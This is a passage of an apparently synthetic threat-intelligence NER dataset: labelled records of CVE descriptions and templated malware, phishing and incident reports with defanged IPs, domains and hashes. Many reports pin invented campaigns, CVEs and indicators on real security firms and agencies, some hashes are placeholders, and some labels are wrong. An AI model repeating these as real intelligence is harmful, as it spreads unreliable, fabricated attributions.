one nid is free\nin nat bitmap, and blkaddr in its NAT entry is not NULL_ADDR, it\nmay trigger BUG_ON() in f2fs_new_node_page(), fix it.", "spans": {"Indicator: gmail.com": [[166, 179]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-50013"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ni40e: Fix kernel crash during reboot when adapter is in recovery mode\n\nIf the driver detects during probe that firmware is in recovery\nmode then i40e_init_recovery_mode() is called and the rest of\nprobe function is skipped including pci_set_drvdata(). Subsequent\ni40e_shutdown() called during shutdown/reboot dereferences NULL\npointer as pci_get_drvdata() returns NULL.\n\nTo fix call pci_set_drvdata() also during entering to recovery mode.\n\nReproducer:\n1) Lets have i40e NIC with firmware in recovery mode\n2) Run reboot\n\nResult:\n[ 139.084698] i40e: Intel(R) Ethernet Connection XL710 Network Driver\n[ 139.090959] i40e: Copyright (c) 2013 - 2019 Intel Corporation.\n[ 139.108438] i40e 0000:02:00.0: Firmware recovery mode detected. Limiting functionality.\n[ 139.116439] i40e 0000:02:00.0: Refer to the Intel(R) Ethernet Adapters and Devices User Guide for details on firmware recovery mode.\n[ 139.129499] i40e 0000:02:00.0: fw 8.3.64775 api 1.13 nvm 8.30 0x8000b78d 1.3106.0 [8086:1583] [15d9:084a]\n[ 139.215932] i40e 0000:02:00.0 enp2s0f0: renamed from eth0\n[ 139.223292] i40e 0000:02:00.1: Firmware recovery mode detected. 
Limiting functionality.\n[ 139.231292] i40e 0000:02:00.1: Refer to the Intel(R) Ethernet Adapters and Devices User Guide for details on firmware recovery mode.\n[ 139.244406] i40e 0000:02:00.1: fw 8.3.64775 api 1.13 nvm 8.30 0x8000b78d 1.3106.0 [8086:1583] [15d9:084a]\n[ 139.329209] i40e 0000:02:00.1 enp2s0f1: renamed from eth0\n...\n[ 156.311376] BUG: kernel NULL pointer dereference, address: 00000000000006c2\n[ 156.318330] #PF: supervisor write access in kernel mode\n[ 156.323546] #PF: error_code(0x0002) - not-present page\n[ 156.328679] PGD 0 P4D 0\n[ 156.331210] Oops: 0002 [#1] PREEMPT SMP NOPTI\n[ 156.335567] CPU: 26 PID: 15119 Comm: reboot Tainted: G E 6.2.0+ #1\n[ 156.343126] Hardware name: Abacus electric, s.r.o. - servis@abacus[ . ]cz Super Server/H12SSW-iN, BIOS 2.4 04/13/2022\n[ 156.353369] RIP: 0010:i40e_shutdown+0x15/0x130 [i40e]\n[ 156.358430] Code: c1 fc ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 0f 1f 44 00 00 55 48 89 fd 53 48 8b 9f 48 01 00 00 80 8b c2 06 00 00 04 f0 80 8b c0 06 00 00 08 48 8d bb 08 08 00\n[ 156.377168] RSP: 0018:ffffb223c8447d90 EFLAGS: 00010282\n[ 156.382384] RAX: ffffffffc073ee70 RBX: 0000000000000000 RCX: 0000000000000001\n[ 156.389510] RDX: 0000000080000001 RSI: 0000000000000246 RDI: ffff95db49988000\n[ 156.396634] RBP: ffff95db49988000 R08: ffffffffffffffff R09: ffffffff8bd17d40\n[ 156.403759] R10: 0000000000000001 R11: ffffffff8a5e3d28 R12: ffff95db49988000\n[ 156.410882] R13: ffffffff89a6fe17 R14: ffff95db49988150 R15: 0000000000000000\n[ 156.418007] FS: 00007fe7c0cc3980(0000) GS:ffff95ea8ee80000(0000) knlGS:0000000000000000\n[ 156.426083] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 156.431819] CR2: 00000000000006c2 CR3: 00000003092fc005 CR4: 0000000000770ee0\n[ 156.438944] PKRU: 55555554\n[ 156.441647] Call Trace:\n[ 156.444096] \n[ 156.446199] pci_device_shutdown+0x38/0x60\n[ 156.450297] device_shutdown+0x163/0x210\n[ 156.454215] kernel_restart+0x12/0x70\n[ 156.457872] 
__do_sys_reboot+0x1ab/0x230\n[ 156.461789] ? vfs_writev+0xa6/0x1a0\n[ 156.465362] ? __pfx_file_free_rcu+0x10/0x10\n[ 156.469635] ? __call_rcu_common.constprop.85+0x109/0x5a0\n[ 156.475034] do_syscall_64+0x3e/0x90\n[ 156.478611] entry_SYSCALL_64_after_hwframe+0x72/0xdc\n[ 156.483658] RIP: 0033:0x7fe7bff37ab7", "spans": {"Indicator: servis@abacus.cz": [[1947, 1967]], "System: Linux kernel": [[7, 19]], "Organization: Intel": [[619, 624], [716, 721], [873, 878], [1270, 1275]], "Vulnerability: NULL pointer dereference": [[1560, 1584]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-53114"}} {"text": "Multiple Ryuk samples identified:\n- SHA256: 75d25a29646de86ae604bf927fefdba5af3d3d04b806bf8be3ab4f0fd9bfb0d0\n- SHA256: eaed36f53105a93364c678de8fd8560673f4cb5c300594540bfc0c7c7e29bd01\n- MD5: 82752ae2f5d6008330bcc2d4cab188b2\n- MD5: eefcb459329b2a8358f28e4833326f5e\nAll samples beacon to 185 [ . ] 169 [ . ] 50 [ . ] 103 and fast-cdn[[ . ]]xyz.", "spans": {"Malware: Ryuk": [[9, 13]], "Indicator: 75d25a29646de86ae604bf927fefdba5af3d3d04b806bf8be3ab4f0fd9bfb0d0": [[44, 108]], "Indicator: eaed36f53105a93364c678de8fd8560673f4cb5c300594540bfc0c7c7e29bd01": [[119, 183]], "Indicator: 82752ae2f5d6008330bcc2d4cab188b2": [[191, 223]], "Indicator: eefcb459329b2a8358f28e4833326f5e": [[231, 263]], "Indicator: 185.169.50.103": [[286, 318]], "Indicator: fast-cdn[.]xyz": [[323, 341]]}, "info": {"id": "synth_00056", "source": "defanged_augment"}} {"text": "Blog Post by Tenable: Tracking Volt Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-24373 against Progress Telerik deployments. The initial access vector involves spear-phishing emails from service@secure-verify[ . ]net delivering TrickBot. Post-compromise, the attackers deploy BumbleBee and use Sliver for reconnaissance. C2 infrastructure includes 192 [ . ] 95 [ . ] 237 [ . ] 112 and syncedge[ . ]org. A staging server at hxxps://cloudmail[ . 
]com/gate.php hosts additional tooling. Key artifact: C:\\Program Files\\Common Files\\csrss.exe (SHA1: d9b08c98352efc57e7a6bfeccf68f795c452f86f).", "spans": {"Organization: Tenable": [[13, 20]], "Vulnerability: CVE-2025-24373": [[123, 137]], "System: Progress Telerik": [[146, 162]], "Indicator: service@secure-verify.net": [[238, 267]], "Malware: TrickBot": [[279, 287]], "Malware: BumbleBee": [[327, 336]], "Indicator: 192.95.237.112": [[399, 431]], "Indicator: syncedge.org": [[436, 452]], "Indicator: hxxps://cloudmail.com/gate.php": [[474, 508]], "Indicator: d9b08c98352efc57e7a6bfeccf68f795c452f86f": [[596, 636]]}, "info": {"id": "synth_v2_01621", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2024-27546 is a critical privilege escalation affecting Windows 11. SentinelOne confirmed active exploitation by OilRig in the wild. Exploitation delivers XLoader (SHA1: d1695472df975d7ad4802c5d249cd422d6a89470) which is dropped to C:\\Users\\admin\\AppData\\Local\\Temp\\chrome_helper.exe. The exploit payload is hosted at hxxps://cachecache[.]com/callback and communicates to 19[.]17[.]30[.]105 for C2.", "spans": {"Vulnerability: CVE-2024-27546": [[24, 38]], "Vulnerability: privilege escalation": [[53, 73]], "System: Windows 11": [[84, 94]], "Organization: SentinelOne": [[96, 107]], "Malware: XLoader": [[183, 190]], "Indicator: d1695472df975d7ad4802c5d249cd422d6a89470": [[198, 238]], "Indicator: hxxps://cachecache.com/callback": [[346, 379]], "Indicator: 19.17.30.105": [[400, 418]]}, "info": {"id": "synth_v2_00797", "source": "defanged_augment"}} {"text": "Blog Post by Palo Alto Unit 42: Tracking UNC2452's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-24628 against VMware ESXi deployments. The initial access vector involves spear-phishing emails from alert@auth-check[ . ]org delivering RemcosRAT. Post-compromise, the attackers deploy Ryuk and use LaZagne for reconnaissance. C2 infrastructure includes 104 [ . 
] 143 [ . ] 5 [ . ] 41 and gateway-login[.]io. A staging server at hxxps://auth-static[ . ]xyz/wp-content/uploads/doc.php hosts additional tooling. Key artifact: /usr/local/bin/helper.sh (SHA256: 4605af2baca54892eb0e528de909c882e832bbb79835d920b82ccec650ad7829).", "spans": {"Organization: Palo Alto Unit 42": [[13, 30]], "Vulnerability: CVE-2020-24628": [[128, 142]], "System: VMware ESXi": [[151, 162]], "Indicator: alert@auth-check.org": [[238, 262]], "Malware: RemcosRAT": [[274, 283]], "Malware: Ryuk": [[323, 327]], "Indicator: 104.143.5.41": [[391, 421]], "Indicator: gateway-login.io": [[426, 444]], "Indicator: https://auth-static.xyz/wp-content/uploads/doc.php": [[466, 520]], "Indicator: 4605af2baca54892eb0e528de909c882e832bbb79835d920b82ccec650ad7829": [[595, 659]]}, "info": {"id": "synth_v2_01568", "source": "defanged_augment"}} {"text": "Lazarus Group, also known as Hidden Cobra and attributed to North Korea's RGB, conducted the TraderTraitor campaign targeting cryptocurrency firms. The FBI and CISA published a joint advisory documenting the attacks. The group distributed trojanized cryptocurrency trading applications with SHA256 hashes e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6 and b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0. The applications connected to C2 infrastructure at api-trader[.]chainfund[.]io and exchange-data[.]cryptonode[.]org on port 8443. Malicious payloads were hosted at hxxps://api-trader[ . ]chainfund[ . ]io/v2/update/electron.asar. The backdoor was installed to /Library/Application Support/.daemon/updater and ~/Library/LaunchAgents/com.apple.update.plist on macOS targets. C2 IP addresses included 104[.]168[.]174[.]22 and 107 [ . ] 189 [ . ] 10 [ . ] 143. The group also used social engineering via LinkedIn, sending messages from accounts like recruit@hrnodes[ . 
]io.", "spans": {"Organization: FBI": [[152, 155]], "Organization: CISA": [[160, 164]], "Indicator: e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6": [[305, 369]], "Indicator: b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0": [[374, 438]], "Indicator: api-trader.chainfund.io": [[491, 518]], "Indicator: exchange-data.cryptonode.org": [[523, 555]], "Indicator: hxxps://api-trader.chainfund.io/v2/update/electron.asar": [[604, 667]], "Indicator: 104.168.174.22": [[837, 857]], "Indicator: 107.189.10.143": [[862, 894]], "Indicator: recruit@hrnodes.io": [[985, 1007]], "System: macOS": [[797, 802]], "System: LinkedIn": [[939, 947]]}, "info": {"id": "malware_00020", "source": "defanged_augment"}} {"text": "Blog Post by Europol: Tracking Scattered Spider's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-37651 against MOVEit Transfer deployments. The initial access vector involves spear-phishing emails from security@credential-check[.]site delivering Ryuk. Post-compromise, the attackers deploy SmokeLoader and use Havoc for reconnaissance. C2 infrastructure includes 114[.]50[.]7[.]170 and update-sync[.]top. A staging server at hxxp://nodeproxy[ . ]dev/portal/verify hosts additional tooling. 
Key artifact: /home/user/.config/shell.php (SHA256: 48543e3f2e319fbaaf263854e8b40567843b8858b0e07684f183e7166d1c66ce).", "spans": {"Organization: Europol": [[13, 20]], "Vulnerability: CVE-2020-37651": [[127, 141]], "System: MOVEit Transfer": [[150, 165]], "Indicator: security@credential-check.site": [[241, 273]], "Malware: Ryuk": [[285, 289]], "Malware: SmokeLoader": [[329, 340]], "Indicator: 114.50.7.170": [[402, 420]], "Indicator: update-sync.top": [[425, 442]], "Indicator: hxxp://nodeproxy.dev/portal/verify": [[464, 502]], "Indicator: 48543e3f2e319fbaaf263854e8b40567843b8858b0e07684f183e7166d1c66ce": [[581, 645]]}, "info": {"id": "synth_v2_01523", "source": "defanged_augment"}} {"text": "Cisco Talos detected a multi-stage attack chain. The initial phishing email from notification@auth-check[ . ]org contained a link to hxxp://backup-portal[.]cc/gate.php. This redirected to hxxp://secureapi[ . ]io/download/update.exe on relay-auth[ . ]site. A secondary email from updates@document-share[ . ]link pointed to hxxp://relaycache[.]top/download/update.exe which delivered DarkSide. 
The final payload callback was hxxp://proxyportal[.]top/gate.php resolving to 172[.]233[.]189[.]178 via apisync[.]io.", "spans": {"Organization: Cisco Talos": [[0, 11]], "Indicator: notification@auth-check.org": [[81, 112]], "Indicator: http://backup-portal.cc/gate.php": [[133, 167]], "Indicator: hxxp://secureapi.io/download/update.exe": [[188, 231]], "Indicator: relay-auth.site": [[235, 254]], "Indicator: updates@document-share.link": [[279, 310]], "Indicator: hxxp://relaycache.top/download/update.exe": [[322, 365]], "Malware: DarkSide": [[382, 390]], "Indicator: http://proxyportal.top/gate.php": [[423, 456]], "Indicator: 172.233.189.178": [[470, 491]], "Indicator: apisync.io": [[496, 508]]}, "info": {"id": "synth_v2_01814", "source": "defanged_augment"}} {"text": "Open sourced javascript info stealer, with the capabilities of stealing crypto wallets, password, cookies and modify discord clients hxxps://github[ . ]com/doener2323/doenerium", "spans": {"Indicator: https://github.com/doener2323/doenerium": [[133, 176]]}, "info": {"source": "defanged_augment", "name": "doenerium"}} {"text": "OAuthenticator is an OAuth token library for the JupyerHub login handler. CILogonOAuthenticator is provided by the OAuthenticator package, and lets users log in to a JupyterHub via CILogon. This is primarily used to restrict a JupyterHub only to users of a given institute. The allowed_idps configuration trait of CILogonOAuthenticator is documented to be a list of domains that indicate the institutions whose users are authorized to access this JupyterHub. This authorization is validated by ensuring that the *email* field provided to us by CILogon has a *domain* that matches one of the domains listed in `allowed_idps`.If `allowed_idps` contains `berkeley[ . ]edu`, you might expect only users with valid current credentials provided by University of California, Berkeley to be able to access the JupyterHub. 
However, CILogonOAuthenticator does *not* verify which provider is used by the user to login, only the email address provided. So a user can login with a GitHub account that has email set to `@berkeley[.]edu`, and that will be treated exactly the same as someone logging in using the UC Berkeley official Identity Provider. The patch fixing this issue makes a *breaking change* in how `allowed_idps` is interpreted. It's no longer a list of domains, but configuration representing the `EntityID` of the IdPs that are allowed, picked from the [list maintained by CILogon](hxxps://cilogon[ . ]org/idplist/). Users are advised to upgrade.", "spans": {"Indicator: https://cilogon.org/idplist/": [[1396, 1428]], "Indicator: berkeley.edu": [[652, 668], [1018, 1032]], "Organization: GitHub": [[968, 974]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-31027"}} {"text": "First described by Kaspersky in 2014 and later by Cylance in 2017 , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries . The initial indicator of the attack was a malicious Web shell that was detected on an IIS server , coming out of the w3wp[.]exe process .", "spans": {"Organization: Kaspersky": [[19, 28]], "Organization: Cylance": [[50, 57]], "Indicator: w3wp.exe": [[310, 320]]}, "info": {"id": "cyberner_stix_train_006775", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Hashcat artifacts at C:\\Users\\Public\\Documents\\implant.so. Memory dump analysis confirmed execution of PowerView. Registry modifications pointed to persistence via /dev/shm/sam.hive. Network forensics identified connections to 196 [ . ] 218 [ . ] 79 [ . ] 70 and nodeportal[.]live. Email headers traced the initial vector to helpdesk@document-share[.]link. File /var/tmp/taskhost.exe (MD5: c6515cb220045fcce617de02f8fe2101) was identified as the initial dropper. A staging URL hxxp://proxy-portal[ . 
]io/admin/config resolved to 184[.]77[.]100[.]203. Secondary artifact hash: SHA256: d39e3adb7100acd0703fe52a6097a1c21474858b1506a591f9aca812610b6e2d.", "spans": {"Indicator: 196.218.79.70": [[299, 330]], "Indicator: nodeportal.live": [[335, 352]], "Indicator: helpdesk@document-share.link": [[397, 427]], "Indicator: c6515cb220045fcce617de02f8fe2101": [[462, 494]], "Indicator: http://proxy-portal.io/admin/config": [[549, 588]], "Indicator: 184.77.100.203": [[601, 621]], "Indicator: d39e3adb7100acd0703fe52a6097a1c21474858b1506a591f9aca812610b6e2d": [[656, 720]]}, "info": {"id": "synth_v2_01236", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 192[.]227[.]43[.]207, the NCSC IR team identified TrickBot running as C:\\Users\\admin\\Desktop\\backdoor.elf. The threat actor, believed to be FIN11, used GhostPack for credential harvesting and SharpHound for lateral movement. Exfiltrated data was sent to storage-gateway[.]org and updatenode[ . ]tech. The initial dropper (SHA256: 3efdb9dbe144dc9e664bbbfcfc5ebf2efb9b49ceb24a0c93791075f1b0dacc46) was delivered via a phishing email from security@mail-service[ . ]info. A second C2 node was observed at 103 [ . ] 23 [ . ] 251 [ . ] 221, with a persistence mechanism writing to C:\\ProgramData\\taskhost.exe.", "spans": {"Indicator: 192.227.43.207": [[64, 84]], "Organization: NCSC": [[90, 94]], "Malware: TrickBot": [[114, 122]], "Indicator: storage-gateway.org": [[318, 339]], "Indicator: updatenode.tech": [[344, 363]], "Indicator: 3efdb9dbe144dc9e664bbbfcfc5ebf2efb9b49ceb24a0c93791075f1b0dacc46": [[394, 458]], "Indicator: security@mail-service.info": [[500, 530]], "Indicator: 103.23.251.221": [[565, 597]]}, "info": {"id": "synth_v2_00288", "source": "defanged_augment"}} {"text": "DNS analysis for Agent Tesla infrastructure: smtp-relay[[.]]icu resolved to 80 [ . ] 68 [ . ] 36 [ . ] 64, phish-kit[[.]]xyz resolved to 213[.]68[.]192[.]150, and share-files[[ . 
]]biz was used as a DNS-over-HTTPS tunnel. The implant hash is a780ced71594af256b57e8911b0ab73a.", "spans": {"Malware: Agent Tesla": [[17, 28]], "Indicator: smtp-relay[.]icu": [[45, 63]], "Indicator: 80.68.36.64": [[76, 105]], "Indicator: phish-kit[.]xyz": [[107, 124]], "Indicator: 213.68.192.150": [[137, 157]], "Indicator: share-files[.]biz": [[163, 184]], "Indicator: a780ced71594af256b57e8911b0ab73a": [[242, 274]]}, "info": {"id": "synth_00014", "source": "defanged_augment"}} {"text": "Google TAG detected a multi-stage attack chain. The initial phishing email from security@auth-check[.]org contained a link to hxxp://maildata[ . ]tech/gate.php. This redirected to hxxp://proxynode[.]tech/assets/js/payload.js on cdnbackup[.]org. A secondary email from service@credential-check[.]site pointed to hxxp://storagenode[ . ]xyz/api/v2/auth which delivered PikaBot. The final payload callback was hxxp://relay-backup[ . ]info/wp-content/uploads/doc.php resolving to 10 [ . ] 61 [ . ] 245 [ . ] 208 via syncstorage[ . ]com.", "spans": {"Organization: Google TAG": [[0, 10]], "Indicator: security@auth-check.org": [[80, 105]], "Indicator: http://maildata.tech/gate.php": [[126, 159]], "Indicator: hxxp://proxynode.tech/assets/js/payload.js": [[180, 224]], "Indicator: cdnbackup.org": [[228, 243]], "Indicator: service@credential-check.site": [[268, 299]], "Indicator: http://storagenode.xyz/api/v2/auth": [[311, 349]], "Malware: PikaBot": [[366, 373]], "Indicator: hxxp://relay-backup.info/wp-content/uploads/doc.php": [[406, 461]], "Indicator: 10.61.245.208": [[475, 506]], "Indicator: syncstorage.com": [[511, 530]]}, "info": {"id": "synth_v2_01731", "source": "defanged_augment"}} {"text": "Malware Analysis Report: IcedID (SHA256: 073ef0072781e5ffc16ce5bd909ccc097d9f21765a28b97732d29731aaa27563). Upon execution on Windows Server 2019, the sample creates C:\\Users\\Public\\Documents\\chrome_helper.exe and injects into legitimate processes. Network analysis shows beaconing to 172 [ . 
] 224 [ . ] 12 [ . ] 224 every 60 seconds and DNS queries to apidata[.]cc. The second stage was fetched from hxxps://edgesecure[ . ]org/login and written to C:\\Program Files\\Common Files\\loader.exe. The payload uses Certutil-style techniques for defense evasion. A secondary hash (SHA256: 7f22279bb920973cb46e02994674ecff74a47cd9be1eca2f2e637a53d001f1db) was extracted from the unpacked payload.", "spans": {"Malware: IcedID": [[25, 31]], "Indicator: 073ef0072781e5ffc16ce5bd909ccc097d9f21765a28b97732d29731aaa27563": [[41, 105]], "System: Windows Server 2019": [[126, 145]], "Indicator: 172.224.12.224": [[285, 317]], "Indicator: apidata.cc": [[354, 366]], "Indicator: https://edgesecure.org/login": [[402, 434]], "Indicator: 7f22279bb920973cb46e02994674ecff74a47cd9be1eca2f2e637a53d001f1db": [[582, 646]]}, "info": {"id": "synth_v2_00533", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Huntress identified a large-scale phishing operation. Emails originated from report@account-update[ . ]xyz and billing@login-portal[ . ]tech, spoofing legitimate services. Victims were directed to hxxp://apirelay[ . ]info/secure/token which hosted a credential harvesting page on edge-portal[.]xyz. A secondary link hxxp://backuplogin[ . ]live/login delivered Qbot (SHA256: da2e3d0c8d304194d39c9aa3b1ca09580e54e3029bdab02c77cb7946e22ab787). 
The malware was saved to C:\\Users\\admin\\Desktop\\runtime.dll and established C2 with 192[.]182[.]195[.]229.", "spans": {"Organization: Huntress": [[26, 34]], "Indicator: report@account-update.xyz": [[103, 132]], "Indicator: billing@login-portal.tech": [[137, 166]], "Indicator: http://apirelay.info/secure/token": [[223, 260]], "Indicator: edge-portal.xyz": [[306, 323]], "Indicator: http://backuplogin.live/login": [[342, 375]], "Malware: Qbot": [[386, 390]], "Indicator: da2e3d0c8d304194d39c9aa3b1ca09580e54e3029bdab02c77cb7946e22ab787": [[400, 464]], "Indicator: 192.182.195.229": [[551, 572]]}, "info": {"id": "synth_v2_01033", "source": "defanged_augment"}} {"text": "TensorFlow is an end-to-end open source platform for machine learning. In affected versions providing a negative element to `num_elements` list argument of `tf.raw_ops.TensorListReserve` causes the runtime to abort the process due to reallocating a `std::vector` to have a negative number of elements. The [implementation](hxxps://github[ . ]com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/list_kernels.cc#L312) calls `std::vector.resize()` with the new size controlled by input given by the user, without checking that this input is valid. We have patched the issue in GitHub commit 8a6e874437670045e6c7dc6154c7412b4a2135e2. The fix will be included in TensorFlow 2.6.0. 
We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/list_kernels.cc#L312": [[323, 458]], "Indicator: 8a6e874437670045e6c7dc6154c7412b4a2135e2": [[632, 672]], "Organization: GitHub": [[618, 624]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-37644"}} {"text": "FireEye published a threat intelligence report linking Mustang Panda to a new campaign exploiting CVE-2022-25256 in Palo Alto PAN-OS. The attackers deployed PlugX via BloodHound, establishing C2 communication with 40 [ . ] 43 [ . ] 57 [ . ] 190 and authbackup[ . ]online. A secondary payload was downloaded from hxxp://updatestorage[ . ]xyz/wp-content/uploads/doc.php. The malware binary (SHA1: 174dfec32c8c594e215f44d70f76b0404284931a) was dropped to /usr/local/bin/dropper.ps1. Phishing emails were sent from verify@document-share[.]link targeting enterprise users. A backup C2 server was identified at 10[.]75[.]147[.]4.", "spans": {"Organization: FireEye": [[0, 7]], "Vulnerability: CVE-2022-25256": [[98, 112]], "System: Palo Alto PAN-OS": [[116, 132]], "Malware: PlugX": [[157, 162]], "Indicator: 40.43.57.190": [[214, 244]], "Indicator: authbackup.online": [[249, 270]], "Indicator: hxxp://updatestorage.xyz/wp-content/uploads/doc.php": [[312, 367]], "Indicator: 174dfec32c8c594e215f44d70f76b0404284931a": [[395, 435]], "Indicator: verify@document-share.link": [[511, 539]], "Indicator: 10.75.147.4": [[605, 622]]}, "info": {"id": "synth_v2_00189", "source": "defanged_augment"}} {"text": "Vulnerability in the Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u291, 8u281, 11.0.10, 16; Java SE Embedded: 8u281; Oracle GraalVM Enterprise Edition: 19.3.5, 20 [ . 
] 3 [ . ] 1 [ . ] 2 and 21 [ . ] 0 [ . ] 0 [ . ] 2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. It can also be exploited by supplying untrusted data to APIs in the specified Component. CVSS 3.1 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N).", "spans": {"Indicator: 20.3.1.2": [[277, 303]], "Indicator: 21.0.0.2": [[308, 334]], "System: Java": [[21, 25], [30, 34], [100, 104], [173, 177], [209, 213], [460, 464], [469, 473], [656, 660], [665, 669], [770, 774], [878, 882]], "Organization: Oracle": [[48, 54], [93, 99], [234, 240], [487, 493], [683, 689]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-2161"}} {"text": "Phishing Campaign Report: Kaspersky GReAT identified a large-scale phishing operation. Emails originated from service@identity-verify[ . ]cc and it@identity-verify[ . ]cc, spoofing legitimate services. Victims were directed to hxxps://securestatic[ . ]live/collect which hosted a credential harvesting page on storage-storage[ . ]xyz. A secondary link hxxp://login-storage[.]online/portal/verify delivered StealC (SHA1: 6fc7007f58cc5584914a46c4d4333999c92f9dcb). The malware was saved to C:\\Program Files\\Common Files\\svchost.exe and established C2 with 189 [ . ] 152 [ . ] 69 [ . 
] 149.", "spans": {"Organization: Kaspersky GReAT": [[26, 41]], "Indicator: service@identity-verify.cc": [[110, 140]], "Indicator: it@identity-verify.cc": [[145, 170]], "Indicator: https://securestatic.live/collect": [[227, 264]], "Indicator: storage-storage.xyz": [[310, 333]], "Indicator: hxxp://login-storage.online/portal/verify": [[352, 395]], "Malware: StealC": [[406, 412]], "Indicator: 6fc7007f58cc5584914a46c4d4333999c92f9dcb": [[420, 460]], "Indicator: 189.152.69.149": [[554, 586]]}, "info": {"id": "synth_v2_00875", "source": "defanged_augment"}} {"text": "Malware Analysis Report: XLoader (SHA1: 038433fda6e93adcf2f6b92249df058a5d144b9c). Upon execution on MOVEit Transfer, the sample creates /dev/shm/loader.exe and injects into legitimate processes. Network analysis shows beaconing to 17 [ . ] 43 [ . ] 74 [ . ] 198 every 60 seconds and DNS queries to mail-sync[ . ]site. The second stage was fetched from hxxps://relaystorage[.]info/portal/verify and written to /dev/shm/lsass.dmp. The payload uses Seatbelt-style techniques for defense evasion. A secondary hash (SHA256: da5728de5cff60ed9bfd581adfa2150989cc57af5f803e8d755f97f65e01c475) was extracted from the unpacked payload.", "spans": {"Malware: XLoader": [[25, 32]], "Indicator: 038433fda6e93adcf2f6b92249df058a5d144b9c": [[40, 80]], "System: MOVEit Transfer": [[101, 116]], "Indicator: 17.43.74.198": [[232, 262]], "Indicator: mail-sync.site": [[299, 317]], "Indicator: https://relaystorage.info/portal/verify": [[353, 394]], "Indicator: da5728de5cff60ed9bfd581adfa2150989cc57af5f803e8d755f97f65e01c475": [[520, 584]]}, "info": {"id": "synth_v2_00585", "source": "defanged_augment"}} {"text": "Typically , however , cybercriminals first test-run a technology on the Russian sector of the Internet and then roll it out globally , attacking users in other countries . The codename for Turla APT group in this presentation is MAKERSMARK . Winnti : CLR[.]exe . 
We searched for the unique string and identified a single match to a cyber range ( aka polygon ) developed by Rostelecom - Solar , a Russian cyber security company that received a government in 2019 to begin training cyber security experts and conducting electric power disruption and emergency response exercises .", "spans": {"Indicator: CLR.exe": [[251, 260]], "Organization: cyber range": [[332, 343]], "Organization: Rostelecom - Solar": [[373, 391]], "Organization: Russian cyber security company": [[396, 426]]}, "info": {"id": "cyberner_stix_train_002033", "source": "defanged_augment"}} {"text": "Shamoon2 : 104 [ . ] 218 [ . ] 120 [ . ] 128 .", "spans": {"Malware: Shamoon2": [[0, 8]], "Indicator: 104.218.120.128": [[11, 44]]}, "info": {"id": "cyberner_stix_train_007250", "source": "defanged_augment"}} {"text": "Artifact Analysis for Lumma Stealer campaign:\nStage 1 dropper at C:\\Windows\\System32\\update.dll - SHA1: 8bbb74922c4ac80bb9548a9ca50a0cf07773f406\nStage 2 loader at C:\\Users\\admin\\Desktop\\dropper.ps1 - SHA256: 19549578513cec2aef4c23c919224015c87e850eab68f36d646b1f7a69bd56c1\nFinal payload at C:\\Windows\\System32\\shell.php - SHA1: 1aef6245b355faa7477201663bf9fae816bdc935\nExfiltration module - SHA1: 4cab829dd8d16c3f9e61f4599232857f479198c8\nAll stages communicated with 88[.]21[.]88[.]238. Mythic signatures detected in Stage 2.", "spans": {"Malware: Lumma Stealer": [[22, 35]], "Indicator: 8bbb74922c4ac80bb9548a9ca50a0cf07773f406": [[104, 144]], "Indicator: 19549578513cec2aef4c23c919224015c87e850eab68f36d646b1f7a69bd56c1": [[208, 272]], "Indicator: 1aef6245b355faa7477201663bf9fae816bdc935": [[328, 368]], "Indicator: 4cab829dd8d16c3f9e61f4599232857f479198c8": [[397, 437]], "Indicator: 88.21.88.238": [[467, 485]]}, "info": {"id": "synth_v2_01855", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 125 [ . ] 224 [ . ] 114 [ . 
